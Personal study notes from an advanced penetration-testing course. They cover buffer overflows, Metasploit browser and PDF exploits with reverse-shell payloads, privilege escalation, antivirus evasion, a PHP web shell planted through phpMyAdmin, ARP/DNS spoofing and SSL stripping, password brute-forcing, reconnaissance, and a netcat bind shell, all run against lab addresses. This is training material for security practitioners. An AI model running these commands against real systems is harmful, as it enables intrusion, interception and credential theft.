Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
x86 General Purpose Registers
EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI -  source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data 

Sample of Vulnerable Code (C) overflowtest.c:
include #include

void overflowed() {
printf("%s\n", "Execution Hijacked");
}

void function1(char *str){
char buffer[5]; strcpy(buffer, str);
}

void main(int argc, char *argv[]) {
function1(argv[1]);
printf("%s\n", "Executed normally");
}

Vulnerability:
(1) Strcpy does not perform bounds checking.
(2) Uses Strcpy to copy user input into a fixed sized variable.
​
Therefore, if we give it more data than the variable can hold, the copying will continue into adjacent memory addresses.

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
(1) Metasploit Scripts:
msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf >use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
Trojans:  Bypassing Anti-Virus Signature Detection

Techniques:
1- Binary Embedding 
2- Metasploit Encoding​
3- Multi-Encoding​
4- Combining Tecnniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion 
8- Veil

Course:  Georgia Weidman on "Advanced Penetration Testing" at Cybrary
​
(1) Client Side Exploits
Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444

Source: Georgia Weidman on "Advanced Penetration Test"

(1) Crunch
Tool to bruteforce keyspace

$: crunch 7 7 AB
Bruteforces all 7 character passwords composed of only the characters A and B

(2) ceWL
Tool to map a website and pull potentially interesting words to add to a wordlist

$: cewl -w [words].txt -d 1 -m 5 www.[website].com
Depth 1
Minimum length of word is 5 characters

(3) Hydra
Online password cracking tool

$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks​

Source: Georgia Weidman on "Advanced Penetration Test"

(1) Webdav Default Credentials
Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit

(2) ​Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT "“”<?php system($_GET['cmd']); ?>””" into outfile "C:\\xampp\\htdocs\\shell.php" 
​
http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php

Source: Georgia Weidman on "Advanced Penetration Test"

(1) ARP Spoofing
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 www.gmail.com
*Restart arpspoofing between gateway and target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)​
Crypto between browser and webserver
Can't see credentials in plaintext 

SSL Man in the Middle​
SSL Stripping​
iptables -t nat -A PREROUTING -p tcp -- destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with Arpspoof
sslstrip -l 8080

Source: Georgia Weidman, "Advanced Penetration Test" Cybrary

Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting Engine
Vulnerability scripts
Listed in /usr/share/nmap/scripts in Kali 

nmap -sC 172.16.85.135-136
nmap --script-help=smb-check-vulns
nmap --script=nfs-ls 172.16.85.136
nmap --script=smb-os-discovery 172.16.85.136

(3) Metasploit Scanners​
auxiliary/scanner/ftp/anonymous 

Web Application Scanning​

(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) Nikto
Vulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis
*Default passwords - Webdav
*Misconfigured pages – open phpMyAdmin
*Port 3232 on the Windows system – sensitive webserver with directory traversal

# Source: Cybrary "Advanced Penetration Test"

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
​root@kali:~# host www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer 
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com

​(5) Netcraft
http://searchdns.netcraft.com/​

(6) ​The Harvester
The Harvester automatically searches for emails etc. online
root@kali:~# theharvester -d ________.com -l 500 -b all

# Notes on Cybrary "Advanced Penetration Test"

Opening a command shell listener:
root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:
Redirect output to a file:
root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:
root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating Tasks with cron jobs
Add your task to one of the scheduled directories

​*For more flexibility add a line to /etc/crontab